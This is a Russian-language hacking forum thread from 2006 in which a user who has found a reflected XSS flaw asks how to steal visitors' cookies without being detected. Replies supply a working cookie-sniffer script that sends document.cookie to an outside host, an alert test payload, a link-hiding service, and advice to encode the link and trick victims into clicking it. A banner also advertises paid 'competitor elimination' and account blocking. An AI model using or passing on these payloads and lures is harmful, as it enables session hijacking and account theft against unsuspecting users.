Подскажите по Xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Подскажите по Xss

Опции темы

Поиск в этой теме

Опции просмотра

Подскажите по Xss

04.04.2006, 23:49

Laggi

Познающий

Регистрация: 19.08.2005

Сообщений: 44

С нами: 10908092

Репутация: 2

Подскажите по Xss

Нашел XSS уязвимость... в запросе .cgi файла... могу в хтмл-код внедрить любой другой хтмл код :-)
Что дальше сделать можно?

К примеру как беспалева потырить кукизы.. ведь не пошлешь же ты напрямую ссылку со скриптами

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось Laggi; 04.04.2006 в 23:55..

05.04.2006, 03:05

porter

Познающий

Регистрация: 01.03.2005

Сообщений: 80

С нами: 11154714

Репутация: 12

Заныкай ссылку со скриптами здесь - http://loc.netsec.ru/create.html

05.04.2006, 03:09

NaX[no]rT

Members of Antichat

Регистрация: 03.09.2005

Сообщений: 594

С нами: 10886786

Репутация: 685

Если можешь внедрить, так внедряй снифер и всё. Проблема то в чём, не знаешь как? вот, попробуй вставь вот это

Код:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

05.04.2006, 11:13

Laggi

Познающий

Регистрация: 19.08.2005

Сообщений: 44

С нами: 10908092

Репутация: 2

Цитата:

Сообщение от NaX[no]r†

Если можешь внедрить, так внедряй снифер и всё. Проблема то в чём, не знаешь как? вот, попробуй вставь вот это

Код:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

гммм... дело в том, что ХСС видимо пассивный, при гет запросе к примеру могу вставить:
patt="><script>alert(document.cookie)</script>
Вот... гм... как бы его протолкнуть...

05.04.2006, 17:48

Otaku

Познавший АНТИЧАТ

Регистрация: 24.07.2005

Сообщений: 1,057

С нами: 10946149

Репутация: 116

СИ применить. Хотя весьма не надёжно.

05.04.2006, 18:21

drmist

Green member - Level 3

Регистрация: 08.10.2005

Сообщений: 396

С нами: 10836326

Репутация: 239

Я предлогаю ознакомится со следующей статьей.
Мне говорили, что она интересная )))
http://www.security-teams.net/index.php?showtopic=2492

__________________
Никому нельзя верить...

10.04.2006, 23:10

PinkPanther

[ розовый мафиозо ]

Регистрация: 16.03.2005

Сообщений: 301

С нами: 11133086

Репутация: 241

1. переводиш ссылку со скриптом в ури кодировку, и методом СИ париш жертве.
2. поступаеш тем способом что описал я в статье про взлом аккаунтов на народе, или Censored про взлом аккаунтов на форуме Хакера, т.е. из пассива как бы делаеш актив.
3. побольше фантазии!!! ))

09.05.2006, 12:57

alex-19841

Познающий

Регистрация: 31.03.2006

Сообщений: 58

С нами: 10586033

Репутация: 1

porter
Пример можешь показать как заныканой ссылкой пользоваться

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Подскажите Proxy	$ZLO$	Болталка	3	06.02.2005 14:29

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход